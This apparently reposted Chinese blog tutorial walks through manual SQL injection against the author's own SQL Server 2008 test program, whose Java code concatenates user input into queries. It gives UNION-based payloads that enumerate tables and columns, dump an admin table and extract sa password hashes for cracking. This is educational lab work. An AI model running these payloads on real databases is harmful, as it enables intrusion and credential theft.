sqlServer2008 手工注入

接着上一篇的《mysql手工注入》

参考:http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed

http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4

必备知识:

MSSQL注释符号: //  或 – --

 

也就是说上面两个符号后面的内容会被忽略

 

 

环境:

代码还是之前的代码

 

sqlServer2008 手工注入
public class TestSql {

    public static void main(String[] args) throws InstantiationException,
            IllegalAccessException, ClassNotFoundException, SQLException {
        
        DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx","school");
        
        String name = "mynona";
        String address="gdut";
        
        name = "mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
        
        String sql  ="select * from student where name = ‘" + name + "‘ and address = ‘" + address +"‘";
                
        //sql = "select name,  password_hash from sys.sql_logins";
        System.out.println("执行sql:");
        System.out.println(sql);
        System.out.println("输出结果:");
        System.out.println(de.getDateList(sql));

        
    }
}
sqlServer2008 手工注入

 

  

数据库:

 

 

sqlServer2008 手工注入

 

目标:

我们看一下视图,发现和mysql很像

 

sqlServer2008 手工注入

 

 

可以看到有INFORMATION.SCHEMA.TABLES和INFORMATION.SCHEMA.COLUMNS表

我们完全可以利用mysql手工注入的方法

 

 

在上面的视图里面,再往下:

 

sqlServer2008 手工注入

 

 

我们的目标就是上面那个表的name和password

 

 

查看当前select字段数

 

name = "mynona‘ order by 1--";  ok
name = "mynona‘ order by 2--";  ok
name = "mynona‘ order by 3--";  ok
name = "mynona‘ order by 4--";  error

 

可以得出当前select 语句字段数是3

 

暴数据库名:

 

name = "mynona‘ and 1=2 union select 1,db_name(),3--";

 

执行sql:

select * from student where name = ‘mynona‘ and 1=2 union select 1,db_name(),3--‘ and address = ‘gdut‘

输出结果:

[{id=1, address=3, name=school}]

 

 

可是数据库名为school

 

遍历当前数据库的表

 

name = "mynona‘ and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";

 

 

执行sql:

select * from student where name = ‘mynona‘ and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--‘ and address = ‘gdut‘

输出结果:

[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]

 

 

可知表为:admin, school , sysdiagrams

 

 

遍历指定admin的字段

 

 

name = "mynona‘ and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = ‘admin‘--";

 

 

执行sql:

select * from student where name = ‘mynona‘ and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = ‘admin‘--‘ and address = ‘gdut‘

输出结果:

[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]

 

 

可知表admin的字段为:id, name, password

 

 

遍历admin表数据:

 

name = "mynona‘ union select id, name, password from admin--";

 

 

执行sql:

select * from student where name = ‘mynona‘ union select id, name, password from admin--‘ and address = ‘gdut‘

输出结果:

[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]

 

 

即:id=1, address=mynona, name=admin

 

 

遍历sys.sql_logins表

 

name = "mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";

 

 

执行sql:

select * from student where name = ‘mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--‘ and address = ‘gdut‘

输出结果:

[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]

 

 

可以得到:用户sa的password_hash 为0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a

 

 

拿这个hash值破解就可以得到sa的密码了

 

这篇和上一篇的源文件和测试项目下载地址:

http://download.csdn.net/detail/mmyzlinyingjie/7095041

sqlServer2008 手工注入,布布扣,bubuko.com

sqlServer2008 手工注入

上一篇:SQL with as


下一篇:Oracle常用命令13(数据库的启动、关闭)